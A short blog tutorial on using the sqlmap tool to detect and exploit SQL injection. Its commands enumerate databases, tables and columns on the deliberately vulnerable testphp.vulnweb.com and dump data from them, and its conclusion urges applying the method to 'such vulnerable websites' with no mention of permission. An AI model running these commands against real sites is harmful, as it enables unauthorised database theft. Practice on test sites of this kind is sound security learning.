SQL injection using of SQLMAP

SQL injection using of SQLMAP

What is sql injection ?

SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

What is SQLMAP ?

SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.

Where can you use SQLMAP?

When you notice a web url that is of the structure http://testphp.vulnweb.com/listproducts.php?cat=1, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is php based.

sql vulnerable
Sql vulnerable

A simple way to check whether your website is vulnerable or not, replace the value in the get request parameter with an asterisk (*), if you got sql error, then we can conclusively say that the website is vulnerable.

Sql vulnerable
Installing sqlmap command
sudo apt-get install sqlmap 

In this tutorial, we will use vulnerable website that is designed for testing purpose.

Open this link in your browser

http://testphp.vulnweb.com/listproducts.php?cat=1

1. List information of existing database

Open your terminal and type

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Where, -u for url and –dbs for database list.

Output showing us that there are two available databases, acuart and information_schema. In some case, the application will tell you that it has identified the database and ask whether you want to test other database types. You can go ahead and type ‘Y’.

2. List information about Tables present in a particular Database 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables 

Where, -u for url , -D for databse, –tables for tables present in database.

We see that 8 tables have been retrieved. So now we can say that the website is definitely vulnerable.

3. List information about the columns of a particular table 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns

Where, -u for url , -D for databse, -T for table, –columns for column present in table

3 columns found in ‘artists’ table in ‘acuart’ database

4. Dump the data from the columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

Where, -C for column name and –dump for dump data from the column

You can see that we have accessed the data from the database.

Conclusion

Apply this method in such vulnerable websites, You can literally explore through the databases to extract information.

Sqlmap Cheat Sheet

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply